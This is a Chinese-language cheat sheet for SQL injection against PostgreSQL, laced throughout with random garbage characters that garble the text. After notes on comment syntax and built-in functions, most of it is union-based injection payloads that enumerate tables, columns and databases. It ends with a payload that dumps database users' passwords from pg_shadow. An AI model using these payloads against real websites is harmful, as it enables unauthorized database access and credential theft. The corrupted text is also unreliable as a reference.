结合了MSSQL MySQL Oracle的一些特点
2 \6 z7 Q: [# l. N8 K5 ~支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/
4 ^& C! p$ @ @' S+ S# w$ V5 U连接符: %20 , + , /**/ 内置函数:# W+ D s) r% g0 o
current_database() //当前数据库名
2 u7 {: w* e9 h; i5 Vsession_user //会话用户
- j; h8 m8 ]' j% j. {) R7 mcurrent_user //当前数据库用户" M) c/ R9 j' i, m8 z/ c7 Z
user //当前用户
: {6 s3 a z4 ]5 h. Qversion() //数据库版本 Union注射:* c* U* x* N, A$ `* W3 g' K
order by n–
" {% o$ _ l: K# Z- {and 1=2 union select null,null,null–
( V J! U- M5 a. X" \6 H& M' qand 1=2 union select ‘beach’,null,null–. ?, B7 v, h# S: z7 E
and 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):2 u1 P0 H3 J' d; F! s- m
group_concat(table_name)2 q* k/ {2 `, X
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
4 l5 W4 X$ H% nand 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
. u, m2 C, |4 U! X: E(老版本)
- m5 j2 g, J: ?& k# W8 \& \9 tpg_class.oid对应pg_attribute.attrelid- M" ?& c/ C* k1 g: i
pg_class.relname表名5 W2 \% |3 _% Y! J4 b
pg_attribute.attname字段名 select relname from pg_class获取表名$ _' G+ d4 Y' z- H0 c
select oid from pg_class where 条件 获取参数/ ]& H/ V$ r3 q
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:
; a9 ?! H) R. ^, `7 n9 `and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表9 O: \' f0 _6 R0 E( e/ p, F ` v
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
y0 {) b) g6 ~2 c3 |由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名% M, m( Z# R. m" p4 Q: [. ^
======================================================================
* v: s0 v: x" Sand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库! L. ^" G) b+ c6 B; G
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |